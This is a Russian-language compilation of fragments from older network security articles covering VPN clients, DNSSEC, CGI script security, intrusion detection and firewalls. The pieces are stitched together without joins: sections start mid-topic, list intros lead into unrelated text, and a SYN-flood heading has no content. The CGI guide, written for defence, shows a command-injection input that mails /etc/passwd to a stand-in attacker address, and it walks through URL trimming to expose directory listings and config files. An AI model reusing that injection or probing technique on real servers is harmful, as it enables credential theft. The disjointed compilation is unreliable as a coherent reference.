Отказоустойчивость средств контроля доступа на основе содержания может быть достигнута за счет установки на предприятии пула серверов, на которых работает один и тот же набор сервисов контроля третьих фирм. Отказ одного из таких серверов не влечет отказ системы системы контроля доступа по содержанию, а только означает некоторое снижение ее производительности.
Направления развития средств безопасности предприятия
Виктор Олифер,
Сегодня неотъемлемым элементом бизнеса многих предприятий становится осуществление электронных транзакций по Internet и другим публичным сетям. Прогнозируемое превращение в недалеком будущем Internet в новую публичную сеть (New Public Network), предоставляющую массовому пользователю все виды информационных услуг и переносящую все виды трафика в глобальном масштабе, должно превратить эту тенденцию в норму жизни. Электронная коммерция, продажа информации, оказание консультационных услуг в режиме on-line и многие другие услуги становятся для предприятий в новых условиях основными видами деятельности, поэтому разрушение информационного ресурса, его временная недоступность или несанкционированное использование могут нанести предприятию значительный материальный ущерб. В связи с этим информационные ресурсы и средства осуществления электронных сетевых транзакций (серверы, маршрутизаторы, серверы удаленного доступа, каналы связи, операционные системы, базы данных и приложения) нужно защищать особенно надежно и качественно - цена каждой бреши в средствах защиты быстро растет и этот рост будет в ближайшем будущем продолжаться.
Поддержание массовых и разнообразных связей предприятия через Internet с одновременным обеспечением безопасности этих коммуникаций является сегодня основным фактором, влияющим на развитие средств защиты предприятия.
Трансформация Internet в глобальную публичную сеть означает для средств безопасности предприятия не только резкое увеличение количества внешних пользователей и разнообразие типов коммуникационных связей, но и сосуществование с новыми сетевыми и информационными технологиями. Для создания прочной основы массовой глобальной сети IP-технологии быстро приобретают такие новые свойства как поддержка дифференцированного по пользователям и приложениям качества обслуживания (QoS), управление сетью на основе централизованной политики, групповое вещание и т.д., и т.п. Постоянно появляются и новые информационные сервисы, например, сервис передачи голоса - VoIP, сервис поиска и доставки новостей PointCast и другие. Средства безопасности должны учитывать эти изменения, так как каждая новая технология и новый сервис могут потребовать своих адекватных средств защиты, а также оказать влияние на уже применяемые. Например, дифференцированное обслуживание трафика на основе признаков, находящихся в заголовке и поле данных IP-пакета, может быть затруднено работой средств инкапсуляции и шифрации IP-пакетов, применяемых в защищенных каналах VPN и закрывающих доступ к нужным признакам. На средства защиты может оказать значительное влияние и появление новых отдельных продуктов, особенно в том случае, когда ожидается массовое применение такого продукта (свежий пример этого рода - выход в свет Windows 2000).
Перспективные средства защиты данных предприятия должны учитывать появление новых технологий и сервисов, а также удовлетворять общим требованиям, предъявляемым сегодня к любым элементам корпоративной сети:
Основываться на открытых стандартах. Средства защиты особенно тяготеют к фирменным решениям, т.к. отсутствие информации о способе защиты безусловно повышает эффективность защиты. Однако без следования открытым стандартам невозможно построить систему защиты коммуникаций с предприятиями-партенерами и массовыми клиентами, которых поставляет сегодня Intrenet. Принятие таких стандартов как IPSec и IKE представляет значительный шаг в направлении открытости стандартов и эта тенденция должна поддерживаться. Обеспечивать интегрированные решения. Интеграция требуется в разных аспектах:
интеграция различных технологий безопасности между собой для обеспечения комплексной защиты информационных ресурсов предприятия - например, интеграция межсетвого экрана с VPN-шлюзом и транслятором IP-адресов. интеграция средств защиты с остальными элементами сети - операционными системами, маршрутизаторами, службами каталогов, серверами QoS-политики и т.п.
Допускать масштабирование в широких пределах, то есть обеспечивать эффективную работу при наличии у предприятия многочисленных филиалов, десятков предприятий-партнеров, сотен удаленных сотрудников и миллионы потенциальных клиентов.
Для того, чтобы обеспечить надежную защиту ресурсов корпоративной сети сегодня и в ближайшем будущем, разработчики системы безопасности предприятия должны учитывать следующие основные тенденции:
Насколько опасны различные атаки?
Очень часто многие люди утверждают, что в их системах нет ничего такого, что могло бы представлять интерес для других. Однако если на в этих системах хранятся финансовые записи, номер социального страхования или с указанных, "никому не нужных", систем осуществлялась оплата по кредитной карте, то такие системы могут заинтересовать многих.
Что более важно, существует проблема допустимой ответственности. Вы потенциально несете ответственность за повреждения, нанесенные злоумышленником, использующим ваш компьютер как базовую площадку для атаки. Вы должны доказать суду, что принимали "соответствующие" меры для защиты от хакеров. Например, к вашему компьютеру подключен модем, и доступ к привилегированным учетным записям не ограничен. Затем, если хакер через ваш компьютер вторгается в какой-нибудь банк, то вы можете быть задержаны за несоблюдение защитных мер на вашем компьютере. (Что характерно, с принятием нового Уголовного Кодекса, эта ситуация применима и в России. Статья 274 устанавливает ответственность за несоблюдение мер эксплуатации компьютерной техники - примечание переводчика).
Имеется хорошая публикация на эту тему, в которой описано в какой опасности вы находитесь, когда подключаетесь к Internet ().
Настройка основных параметров
Первое столкновение пользователя с VPN происходит при инсталляции соответствующего ПО. Как правило, мы не оцениваем процедуры установки клиентского ПО. Однако, поскольку в данном случае инсталляция обычно производится удаленно, нам захотелось посмотреть, как это происходит. Мы оценивали, как в каждом "нашем" продукте осуществляется настройка процедуры аутентификации VPN-клиента, конфигурирование клиентской программы и как устанавливаются правила защиты.
Одна из сложностей при настройке VPN-клиента связана с передачей ключей шифрования. Использовать для этого процедуру рассылки сертификатов общедоступного ключа, которые обеспечивают наилучшую защиту, - задача долгая и громоздкая. Кроме того, частная клиентская половина общедоступного ключа не передается по сети, она должна быть создана непосредственно на ПК клиента и заблокирована там специальным паролем.
Ни один из производителей не предложил волшебного способа передачи информации о ключе. Почти во всех протестированных продуктах используется довольно простой и не слишком защищенный метод аутентификации, а именно: каждому клиенту назначается имя пользователя и пароль. Однако во многих дополнительно поддерживается и цифровая сертификация общедоступных ключей, которая базируется либо на стандартных, либо на своих собственных наборах сертификатов для присвоения полномочий.
Компания TimeStep в своем продукте Permit Enterprise наиболее серьезно подошла к решению проблемы цифровой сертификации и построению схемы присвоения полномочий. В комплект ПО для управления предприятием она встроила средство выдачи сертификатов компании Entrust и справочник шифрования по стандарту X.500. Их комбинация позволяет масштабировать функции выдачи сертификатов для присвоения полномочий, используя специальный каталог базы данных.
Построение целостной системы для организации, управления, защиты и аннулирования цифровых сертификатов означает создание инфраструктуры общедоступного ключа (public-key infrastructure, PKI). Тут следует говорить именно об инфраструктуре, так как процедура инсталляции PKI может быть столь же сложна, как и построение любой другой части вашей сетевой структуры. Для корректной установки PKI необходимо, чтобы сетевой администратор и администратор безопасности совместно определили весь круг правил и процедур, необходимых для идентификации пользователей сети. Правильная организация PKI - дело весьма сложное. Пожалуй, изо всех рассматриваемых в этом обзоре компаний с ним удалось справиться только TimeStep: лишь в продукте Permit Enterprise поддержка PKI была заложена с самого начала его создания и не выглядела "заплаткой".
Процедура задания правил защиты и конфигурации сети. Попроще, чем настройка ключей защиты, поскольку одно и то же правило обычно распространяется на всю группу пользователей. В четырех продуктах - F-Secure VPN (Data Fellows), RiverWorks Enterprise VPN (Indus River), VPN Gateway Plus (Intel) и VPNWare (VPNet) информация о правилах защиты загружается в ПК клиента по сети. Во всех остальных эта задача решена более традиционно. Вы должны подготовить специальный комплект для инсталляции, состоящий из предназначенных для определенной сети файлов инициализации и изображений, поставляемых производителем. Как только эти комплекты розданы, конечные пользователи получают информацию о корпоративных правилах одновременно с установкой клиентского ПО.
А вот продукты VPN Gateway Plus и VPNWare автоматически загружают клиенту информацию о его правилах защиты в процессе инсталляции, что позволяет тут же определить правила защиты данных в сети.
В F-Secure VPN и RiverWorks эта функция получила дальнейшее развитие: после того как клиент заканчивает начальное конфигурирование, он автоматически получает от управляющего сервера информацию обо всех обновлениях в системе правил сети.
Если вы используете весь комплект ПО Data Fellows, включая антивирусную программу и инструментарий для шифрования файлов, модуль управления правилами координирует посылку разных обновлений, в том числе сигнатур вирусов и применяемых правил. Элегантное решение, хотя оно работает только в среде Windows.
В ПО RiverWorks компании Indus River передача правил клиенту организована еще более изощренно и сложно: на единой контрольной панели управления, размещенной на экране ПК конечного пользователя, отображаются параметры доступа в сеть по коммутируемой линии и информация, необходимая для VPN-аутентификации.
River Pilot - компонент ПО RiverWorks - вносит в данные VPN-клиента все телефонные номера корпоративного поставщика Internet-услуг, коды и правила доступа. Когда пользователь дает команду на соединение, ПО клиента, используя локальную информацию о телефонных номерах доступа, дозванивается до Internet-провайдера и обеспечивает пользователю любой тип связи, от тонального вызова до шифрованного VPN-соединения.
Сетевой администратор проверяет буквально все аспекты соединения: и разрешено ли использовать номер службы 800, и какой поставщик Internet-услуг является предпочтительным в каждом городе - вплоть до того, какие конечные пользователи подключены к корпоративной сети. Эта информация об установленных правилах вместе с перепроверенным списком номеров дозвона загружается на клиенты при подключении. В некоторых случаях, например при развертывании большой сети VPN, эти заложенные в Indus River возможности дают явные преимущества. Например, для организации, имеющей множество поставщиков Internet-услуг, которая редко связывается с филиалами и штаб-квартирой по коммутируемому каналу и нечасто использует номер аварийной службы 800 (т. е. соединения, управляемые с центральной консоли корпоративной сети), River Pilot явно сократит затраты на поддержку, одновременно улучшив управление.
У всех других протестированных продуктов ПО шифрования является дополнительной к Windows сетевой службой. Их производители считают, что пользователь уже настроил сетевое соединение либо через ЛВС, либо по коммутируемой линии связи.
Еще одно свойство, выделяющее некоторые из протестированных продуктов, - возможность блокировки правил. После загрузки информации о правилах и конфигурации некоторые продукты, например VPN Gateway Plus (Intel) и VPN-1 Gateway (Check Point Software), позволяют заблокировать эти данные таким образом, что клиент не может изменить их. RiverWorks (Indus River), VPN Concentrator Series (Altiga Networks) и Security Management Server (Lucent) работают только в этом режиме. А вот Ravlin 7100 (RedCreek) и F-Secure VPN+ 4.2 (Data Fellows) в любое время полностью контролируют работу пользователя.
Какой из подходов к обеспечению безопасности лучше - зависит от рабочей среды. К сожалению, пока нет такого продукта, который один удовлетворял бы всем потребностям рынка. Так что у вас всегда есть возможность выбирать между полной свободой и полным контролем за каждым из клиентов.
НЕДОСТАТКИ DNSSEC
Подписание и проверка данных DNS, очевидно, создают дополнительные накладные расходы, отрицательно сказывающиеся на производительности сети и серверов. Подписи занимают немало места, часто они намного превышают по объему данные, под которыми стоят. Это увеличивает нагрузку, которую DNS возлагает на магистраль Internet и многие немагистральные каналы. Генерация и проверка подписей отнимают значительное время ЦПУ. В некоторых случаях однопроцессорный сервер DNS придется даже заменить многопроцессорным сервером DNS. Подписи и ключи могут занимать на порядок больше места на диске и в оперативной памяти, чем собственно данные. Базы данных и системы управления придется наращивать, чтобы они могли справляться с возросшими объемами.
Кроме того, реализация DNSSEC сопровождается и другими, не столь очевидными затратами. Новое программное обеспечение больше по объему и сложнее, чем прежнее, а многие его компоненты являются совершенно новыми и нуждаются в обширном тестировании в реальных условиях. Пока широкомасштабных испытаний DNSSEC в Internet не проводилось, так что они могут принести множество сюрпризов (возможно, даже придется полностью менять).
Вывод отсюда следующий: развертывание DNSSEC чревато столькими же опасностями, как и отказ от него. Мы бы рекомендовали обождать год или два, пока DNSSEC RFC не получит статуса хотя бы проекта стандарта.
На декабрь 1999 года TSIG полностью и DNSSEC частично были реализованы только в BIND 8.2. Другие разработчики (включая Microsoft) собираются реализовать различные формы TSIG в следующих редакциях своих продуктов. Спецификация BIND 9.0, появление которой ожидается в первой четверти 2000 года, будет содержать полную реализацию DNSSEC.
Некоторые аспекты безопасности при написании и установке CGI-скриптов.
Превод с англ. и доработка текста:
Автор: Selena Sol
| Сценарии CGI несут в себе столько же опасности, сколько и пользы. Но это не говорит о том, что вы не должны ими пользоваться. На то и существует компьютерная безопасность, чтобы брать ситуацию в свои руки. Вы никогда не можете быть в полной безопасности, если предоставляете определенный сервис или какие-то услуги. Однако без последнего вы можете ровно столько же, сколько и без самого компьютера. Таким образом, защита становится важнее, в рамках приемлемого риска и с учетом возможного восстановления, после нарушения работы системы, чем полная недоступность. Это - ваша работа, удостовериться, что всех отрицательных аспектов, касающихся безопасности вашего web-сервера, значительно меньше чем положительных. Ниже обсуждаются фундаментальные концепции безопасности и защиты при установке и настройке уже написанных (pre-built) CGI сценариев. А так же даются отправные точки для поиска дальнейшей информации. |
"Все данные мошеннические.
Всякую систему пытаются взломать.
Все клиенты - воры.
Технология - только моя первая строка защиты".
- унылый утренний перечень Администратора.
Минута соединения вашего компьютера с Internet - это минута, когда безопасность ваших данных подвергается риску. Даже наиболее безопасные системы, которые находятся под контролем наиболее образованных и способных, с большим опытом, системных администраторов, с использованием самого современного и проверенного програмного обеспечения, постоянно находятся в опасности, каждый день. Как было доказано Кевином Митником (Kevin Mitnick) при взломе San Diego Supercomputer Center в 1994 году, даже самые "закаленные" защиты, написанные ветеранами подобно Tsutomu Shimamura можно, обойти.
Весьма печальным фактом является то, что хакеры зачастую обладают некоторыми преимуществами. Время, постоянство, творческий потенциал, сложность программного обеспечения, окружение сервера и невежество рядового пользователя - их оружие. Администратор системы должен манипулировать множеством, постоянно изменяющихся, комплексно связанных аспектов безопасности в целом, в то время как хакерам требуется только терпеливо ждать, когда администратор ошибется. А ведь конечно, не надо забывать, что администратор - только человек и зачастую один.
Таким образом работа системного администратора не может состоять только из создания среды отлова хакеров и атак. Скорее администратор может надеятся на то что, формируемая система будет в достаточной степени отказо-устойчивой и защищенной от проникновения злоумышлиника.
Среда, защищенная от хакера - эта та среда, в которой сделано все настолько безопасно, насколько это возможно, а также создание таких условий, что в случае успешного проникновения злоумышлиника в систему, оно наносило минимум ущерба.
Таким образом, например, в минимальном случае, администратор системы должен резервировать все данные системы таким образом, чтобы, если данные были злонамеренно или случайно уничтожены или изменены, их можно было бы, с наибольшей степенью вероятности и целостности, восстановить.
| Кстати сказать, не думайте, что, если вы официально не являетесь системным администратором, то все вышесказанное к вам не относится. Фактически, как только вы выполняете или используете CGI сценарий, вы становитесь разновидностью системного администратора. Например, создавая Web Site, оснащенный некоторым количеством CGI сценариев, вы получаете собственных пользователей, файлы данных, и соответственно все аспекты безопасности, связанные с ними. |
Удостоверьтесь, что пользователи понимают что такое "хороший" пароль, и что такое "плохой" пароль и чем они отличаютя. "Хорошие" пароли не могут быть найдены в словаре и как правило составляются из букв, цифр и символов. "Хорошие" пароли также регулярно меняются и не пишутся на клочках бумаги в настольных книгах.
Удостоверьтесь, что права доступа к файлам (file permissions) установлены верно.
Удостоверьтесь, что не пропустили очередной объявленной заплаты (patches) или исправлении бага (bug fixed). Например, можно подписаться на CERT или CIAC mailist (список рассылки), или регулярно посещать сайт, распростроняющий используемый вами код.
Пытайтесь регулярно взломать ваш сайт самостоятельно. Изучите инструментальные средства хакеров (hack tools), ведь они используют против вас лучшие средства для несанкционированного доступа в вашу систему.
Регулярно создавайте резервные копии.
Создавайте и постоянно проверяйте, анализируйте регистрационные или log-файлы (log files) фашей системы.
Защита вашего web сервера - это серьезный вопрос, к которому вы должны подходить с особым вниманием и уделять этому достаточно времени. К сожалению, слишком много администраторов в сети, которые приходят к ошибочному мнению на основании высказывания типа "так как мой сайт не имеет высокой посещаемости в сети, то его 'ломать' никто не будет". В действительности же, как только ваш источник информации попадает в сеть (например Internet), в тот же момент значительное количесво хакеров, не имея на то особых оснований или причин, просто с целью нанести ущерб, осуществляет попытки взломать вашу систему. Как только хакер получает доступ к вашей системе, он может осуществлять действия различного рода.
Рассмотрим некоторые виды возможных действий:
Ваша информация/данные/файлы будут удалены (уничтожены).
Ваша информация/данные/файлы будут проданы вашему конкурену.
Ваша информация/данные/файлы будут модифицированны или изменены, подобно как в случае с сайтами ЦРУ (CIA) и др.
Хакер использует ваш сайт, чтобы предпринять ряд атак на другие сервера. Например он может использовать ваш сайт для атаки на сервер Белого Дома (White House Site) от вашего лица.
Защита и Web сервера.
Web сервер - это один из наиболее опасных сервисов предлагаемых в сети. По существу, сервер дает всей сети доступ к внутренней работе вашей файловой системы. Это уже огромный недостаток, так как програмное обеспечение сервера было ограничено временными границами (с конца 80х годов) для проверки и исследования на наличие в нем "дыр" и лазеек в системе безопасности. Таким образом сайты в сети базируются на чрезвычаино мощных програмных продуктах, которые были проверены на наличие ошибок только частично. Это было бы не так плохо, если бы сервера администрировались людьми, обладающими значительным опытом в безопасности и администрировании систем, а не графического оформления и дизайна сервера. Множество сайтов в сети созданы людьми, пределом знаний которых является html, а на чтение статей такого типа и изучение проблем безопасности у них просто нет времни.
Это не должно указывать пальцем на кого-либо. Не так уж много людей имеющих возможность, время или способности, чтобы заниматься защитой - это так и должно быть. Дело в том, что неправильные пароли, плохо написанные программы, общедоступные файлы и каталоги и т.д будут всегда частью проблемы.
CGI скрипты.
Пренебрегая тем фактом, что северы в сети изначально небезопасны, CGI скрипты ухудшают ситуацию, давая пользователям и хакерам возможность пользоваться особенностями CGI. CGI ценарии - это программы, находящиеся и выполняющиеся на сервере, кторые могут запускаться по запросу от web обозревателя (браузера, browser). Другими словами, CGI сценарии позволяют выполнять мощные программы на вашем сервере, которые, по всей вероятности, находятся на первой стадии своей разработки, составленные любителями и полные лазейками в безопасности.
Однако, так как число пользователей, требующих доступ к CGI сценариям, возросло, то некоторые администраторы стали налагать запрет на запись, установку и публикацию CGI сценариев всех типов.
Так что же должен делать web мастер и как пользовательские CGI сценарии могут помогать в обеспечении комплексной безопасности системы?
CGI сценарий должен быть сделан настолько безопасным, насколько это возможно.
Неизбежные попытки взлома CGI сценариев должны пресекаться.
Предпросмотр скриптов.
Само собой разумеется, что каждый сценарий, устанавливаемый на сервер должен быть изучен и просмотрен как можно большим числом квалифицированных людей. Лучшим вариантом будет отдать системному администратору копию вашего кода (до и после его модификации вами), а так же информацию откуда был взят код и другую возможную информацию, которая может быть полезна администратору. Не думайте о вашем системном администраторе как о параноидальном фашисте. Ведь он проделывает достаточно серьезную работу. Помогите облегчить создание более надежной среды, даже если у вас это отнимет чуть больше времени, чем обычно. Помимо этого, Вы должны читать код самостоятельно! И помните, что, любая часть кода, которую вы не понимаете, несет в себе опасность. Как заказчик, требуйте, чтобы авторы сценария коментировали его ясно и полностью.
Однако, стоит сказать, что дальнейшая ответственность за безопасность системы ложится на вас. Вы должны отслеживать выпуск очередных заплат (patches), исправления ошибок (bug fixes), и так называемых "security announcements". Зачастую эту информацию можно получить там, откуда был взят код. Как только информация подобного рода попадает к вам в руки, вы должны с максимально возможной оперативностью модифицировать вашу систему.
Тот факт, что эта информация доступна вам, говорит о том, что она доступна и хакерам, которые попытаются использовать ее с наибольшей выгодой для себя, а соответственно в ущерб вашей системе.
Дальнейшая поддержка и ответственность - это важный аспект для внештатных разработчиков CGI кода, которые написав сценарий и установив его на сервер, как правило, исчезают из поля зрения заказчика. Необходимо, чтобы ответственность за дальнейшее исправление ошибок, выпуск заплат и подобного рода деятельность ложилась на плечи автора, в противном случае последний должен оставлять клиенту информацию как и где можно получить очередную модификацию кода а также руководство по его установке. Либо же информацию о людях, которые уполномочены и имеют достаточную квалификацию для проведения подобного рода работ.
Написание безопасных CGI скриптов.
Хотя эта статья прежде всего обращает свое внимание на аспекты безопасности при установке и настройке уже написанных CGI скриптов, также нельзя оставить без внимания основные принципы написания безопасного кода. Ведь, в конце концов, часью работы по установке и настройке включаемого кода является и написание некоторого собственного кода.
Пожалуй, самый лучший источник информации по написанию безопасного CGI кода - это Lincoln Stein's WWW Security FAQ. Скажем так, что вы не должны браться за написание или установку CGI скриптов, если вы полностью не прочитали вышеупомямутый FAQ. Но, тем не менее, приведем некоторые особо важные моменты, на которые стоит обратить внимание при написании CGI скриптов.
Никогда, никогда не допускайте непроверенных данных, переданных удаленным пользователем командной оболочке.
На языке С команды popen() и system() включают в себя вызов подоболочки (subshell) /bin/sh чтобы обработать команду. В Perl это функции system(), exec(), и open(), а так же eval(), которые включают в себя непосредственно вызов интерпретатора языка (Perl). В различных оболочках такими полномочиями обладают функции типа exec и eval.
Обратные ковычки, доступные в интерпретаторах оболочек и Perl для фиксации вывода программ как текстовых строк, также представляют опасность.
Причину такого параноидального поведения можно проиллюстрировать на примере Perl-кода, который посылает адресату информацию введенную, например, пользователем в форму. Текст кода, по началу, кажется безобидным:
$mail_to = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail $mail_to"); print MAIL "To: $mailto\nFrom: me\n\nHi there!\n"; close MAIL;
Проблема заключается в том, что автор кода изначально предполягает, что пользователь введет в форму нужную информацию, т.е. e-mail адресата и переменная $mail_to будет содержать безопасную информацию. Но что произойдет если хитрый хакер введет в поле e-mail адреса следующую строку:
nobody@nowhere.com; mail sbadguys@hell.org</etc/passwd;
Команда open() выполнит следующие команды:
/usr/lib/sendmail nobody@nowhere.com mail badguys@hell.org</etc/passwd
Таким образом файл /etc/passwd, содержащий пароли системы, будет выслан на e-mail хакера, который попытается использовать его для атаки вашей системы.
Другую информацию по CGI безопасности можно получить по адресу:
Защита от "Дурачка".
Вы когда-нибудь изучали web сервер в Internet, путем модификации его URL? К примеру, давайте взглянем на U.S. Census Page, которая находится по адресу http://cedr.lbl.gov/cdrom/doc/lookup_doc.html
Предположим, что мы заинтересованы в том, чтобы также и другие файлы находились в каталоге "/doc" (это могут быть документы, находящиеся в стадии разработки, или просто документы о которых забыли, или же документы, предназначеные для внутреннего пользования). Теперь просто удаляем часть строки, содержащую имя документа "lookup_doc.html". Останется "http://cedr.lbl.gov/cdrom/doc/". И наблюдаем, настроен ли их сервер на генерацию динамического списка.
В данном случае фокус удался и мы получаем сгенерированный сервером динамический индекс каталога "/doc", методом удаления части строки.
Таким образом мы можем видеть сгенерированный список всех файлов и подкаталогов. Фактически, множество серверов в сети сконфигурированы так, что если пользоватьель не указал конкретного имени документа, типа "index.html", то сервер выведет распечатку каталога очень похожую на эту. Все бы ничего, но если сервер настроен так, что можно аналогичным способом получить индекс каталога, где находятся cgi-скрипты, то последствия могут обернуться для системы очень плачевно:
Что вы думаете произойдет, когда пользователь нажмет на файл "auth.setup"? Так как web-сервер должен будет выполнить этот CGI скрипт, соответственно он должен будет также иметь разрешение на его чтение. Таким образом хакер получит содержимое вашего setup-файла в окне браузера. Как вы понимаете данный файл может содержать в себе различные ключи, пути, кофигурационные настройки - и это не единственные файлы несущие в себе компроментирующие данные. Другие файлы могут оказаться файлами паролей, временными файлами, файлами пользователей и другими файлами, которые могут дать хакеру информацию, позволяющую использовать вашу систему в его интересах.
Для предотвращения подобных ситуаций необходимо выполнять следущие правила:
Конфигурируйте свой web-сервер так, чтобы он не генерировал динамических индексов, а выдавал сообщение об ошибке.
Конфигурируйте свой web-сервер так, чтобы он не выполнял никаких файлов кроме *.cgi, и тех, который не находятся в каталоге /cgi-bin
Предоставте серверу файл index.html, даже если он не несет в себе никакой информации. Таким образом если даже сервер некорректно сконфигурирован с точки зрения CGI безопасности, хакер не сможет воспользоваться данной лазейкой.
Существует еще один аспект безопасности, который вы должны учитывать при установке уже написанных, готовых CGI скриптов. Ведь любой другой человек может точно так же получить исходный код вашего скрипта тамже, где взяли его и вы. Таким образом он будет знать все по умолчанию установленные конфигурационные настройки, с которым поставляется код. Поэтому, если вы не измените заданные по умолчанию имена файлов и каталогов, хакер может обратится к файлу напрямую, даже если вы учли все предыдущие моменты.
Другими словами, если я знаю, что вы используете CGI крипт с правами на запись, кторый в свое время использует файл "users.dat" в каталоге "/ScriptA/Users", то я могу обратится к нему непосредственно следующим способом:
http://www.yourdomain.com/cgi-bin/ScriptA/Users/users.dat
Таким образом, как только вы сделали невозможным для хакера получить сгенерированный динамический список, изменили все по умолчанию заданные параметры, имена файлов и каталогов, тем самым вы усложнили жизнь хакеру и облегчили свою.
Каталоги с правами на запись.
Использование каталогов с правами записи, в значительной степени неизбежно. Любое комплексное, а соответственно сложное CGI приложение окажется перед необходимостью записи в файловую систему. Примерами записи являются файлы паролей зарегистрировавшихся пользователей, генерация ключей, ведение log-файлов, временных файлов и т.д.
Проблема состоит из двух моментов. Первый заключается в том, что если пользователю даются права на запись, то он соответственно получает права на удаление. Таким образом, права на запись и на удаление оказываются в одних руках. Поэтому в терминах безопасности сервера они считаются равными. Вторым моментом является, то что хакер может использовать записываемую часть /cgi-bin каталога, чтобы добавить свой собственный CGI-скрипт. Особенную опасность это представляет для многопользовательских серверов типа тех, которые используют обычные провайдеры (ISP, [Internet Service Provider] поставщик услуг Internet (коммерческая фирма, предоставляющая индивидуальным пользователям доступ к службам сети Internet)). Хакеру требуется всего-лишь получить свой собственный, легальный account у тогоже ISP (провайдера), чтобы использовать или найти лазейку в системе безопасности. Для этого ему придется оплатить где-нибудь минут 20 легального доступа в Internet.
| Ксати сказать, эта тактика получения account'а на сервере провайдера в особенности привлекает людей, вечно сующих нос в чужие дела - снуперов (от англ. snoop - "человек, вечно сующий нос в чужие дела" или в качестве глагола "шпионить", "выслеживать"). Если хакер может получить на вашем сервере account, то в вашем арсенале не так уж много способов, не позволить ему взять ваш каталог /cgi-bin и начать его исследовать, ввиду общедоступности сервера. |
Таким образом вы должны не только изменять названия всех файлов и сценариев CGI, но также распологать их в наиболее безопасных местах вашего сервера. Если CGI приложение написано хорошо, то вам не придется копаться в коде и менять все имена файлов и каталогов. Информация подобного рода должна хранится в файле установки CGI приложения.
Также необходимо, чтобы вы защищали все файлы от записи, если в настоящее время он не находится в стадии разработки или редактирования. Другими словами, если вы не редактируете html-файл, то права доступа к нему должны быть установлены только на чтение. Также если вы постоянно не изменяете CGI-скрипт, то права доступа должны быть только на чтение и выполнение, но ни в коем случае не на запись. Короче говоря никогда не предоставляйте любому файлу на вашем сервере права на запись, если он непосредственно не изменяется или не редактируется.
В заключение хочется добавить - всегда создавайте резервные копии ваших файлов. Ожидайте и готовьтесь к самому худшему. Если вы работаете на платформе UNIX, то можете воспользоваться командой tar:
tar cvfp name.tar rootdirectoryname
причем желательно, чтобы вы это делали не реже чем один раз в несколько дней.
Затем вы должны переместить этот файл на машину которая не имеет выхода в сеть или на место, которое имеет наименьшие права доступа типа:
chmod 400
Пользователи платформы Windows могут пользоваться, к примеру, программой WinZip для создания архивов.
Пользовательский ввод.
"Любой ввод со стороны пользователя постоянно подвергается попыткам атаки." Выучите эти слова и повторяйте их сами себе каждый день. От вас требуется анализировать любую информацию и данные, передаваемые CGI-скрипту от пользователя. Хакер может с легкостью испытывать ваше CGI-приложение на выполнение команд, которые могут скомпроментировать систему.
Стоит добавить, что если на сервере включена поддержка SSI, то если CGI-скрипт позволяет ввести пользователю текст, кторый потом будет интерпетироваться браузером пользователя, что происходит в приложениях типа гостевой книги (GuestBook), то хакер может легко ввести SSI-команды, которые браузер успешно выпольнит. Это достаточно часто всречающаяся ошибка в приложениях подобного рода.
Решение этой проблемы сводится к тому, чтобы фильтровать все данные, передаваемые пользователем и удалять любое вхождение SSI-кода. Как правило, это строки типа "<!" , "<-". Лучшим вариантом конечно будет отключить выполнение команд SSI, особенно в сочетании с CGI, т.к. в комплексе они составляют двойную опасность.
Другое, что хотелось бы сказать в заключение, что хакер может и не воспользоваться браузером, а получать и отправлять http-трафик своей программой, что дает ему возможность изменять количество полей формы ввода, просматривать информацию в полях hidden-типа (скрытых полях), которые используются для ввода паролей. Таким образом хакер может передать CGI-сценарию лишнее поле, что может повлиять на устойчивось системы. Поэтому подобного рода данные тоже нужно ограничивать и проверять.
Ну и в заключение хочется повторить те слова, которые были сказаны в качестве эпиграфа:
CGI-сценарии несут в себе столько же опасности, сколько и пользы. Но это не говорит о том, что вы не должны ими пользоваться. На то и существует компьютерная безопасность, чтобы брать ситуацию в свои руки. Вы никогда не можете быть в полной безопасности, если предоставляете определенный сервис или какие-то услуги. Однако без последнего вы можете ровно столько же, сколько и без самого компьютера. Таким образом, защита становится важнее, в рамках приемлемого риска и с учетом возможного восстановления, после нарушения работы системы, чем полная недоступность. Это - ваша работа, удостовериться, что всех отрицательных аспектов, касающихся безопасности вашего web-сервера, значительно меньше чем положительных.
Немного о взломщиках.
На сегодня известно, хорошо изучено и документировано достаточно много различных атак, но, тем не менее, новые атаки появляются практически каждый день. Поэтому небольшим организациям, использующим доморощенне системы защиты сетей, практически невозможно поддерживать их в адекватном состоянии. Компания Check Point Software Technologies, занимающаяся только разработкой системы сетевой защиты и имеющая необходимую инфраструктуру для обнаружения и анализа новых методов взлома систем сетевой безопасности, в состоянии поддерживать свой продукт на должном уровне. Уникальная быстрота реакции и простота внедрения новых способов защиты во многом достигается благодаря использованию технологии инспекции пакетов с учетом состояния протоколов и гибких возможностей языка INSPECT.
Некоторые наиболее типичные атаки и способы защиты от них описаны ниже.
Атака SYN Flooding
Необходимость в обеих системах обнаружения атак сетевого и системного уровней
Оба решения: IDS и сетевого, и системного уровней имеют свои достоинства и преимущества, которые эффективно дополняют друг друга. Следующее поколение IDS, таким образом, должно включать в себя интегрированные системные и сетевые компоненты. Комбинирование этих двух технологий значительно улучшит сопротивление сети к атакам и злоупотреблениям, позволит ужесточить политику безопасности и внести большую гибкость в процесс эксплуатации сетевых ресурсов.
Рисунок, представленный ниже, иллюстрирует то, как взаимодействуют методы обнаружения атак на системном и сетевом уровнях при создании более эффективной системы сетевой защиты. Одни события обнаруживаются только при помощи сетевых систем. Другие - только с помощью системных. Некоторые требуют применения обоих типов обнаружения атак для надежного обнаружения.
Nessus
Nessus () — сканер уязвимых мест в защите, позволяющий выполнять проверку защиты Web-сайта удаленным образом. Разработчики Nessus выпустили этот инструментарий в апреле 1998 года. Nessus поддерживает серверы, которые удовлетворяют требованиям POSIX и работают с клиентами Java, Win32 и X11.
Netfilter и iptables
Группа разработчиков свободно распространяемого программного обеспечения подготовила Netfilter и iptables для интеграции в ядро Linux 2.4. Netfilter () дает пользователям возможность отслеживать обратные связи, ассоциированные с вторжением в сеть, тем самым позволяет выявлять тот факт, что система подвергается атаке. С помощью iptables () пользователи могут определять действия, которые должна предпринять система в случае обнаружения атаки.
Низкая удельная стоимость
Удельная стоимость PIX оказывается гораздо ниже, чем для большинства систем защиты. Во-первых, PIX благодаря наличию менеджера межсетевого экрана прост в установке и конфигурации, при этом сеть необходимо отключать только на непродолжительное время. Кроме того, PIX разрешает прозрачный доступ для мультимедийных приложений, что позволяет избежать модификации параметров рабочих станций - довольно неприятной процедуры.
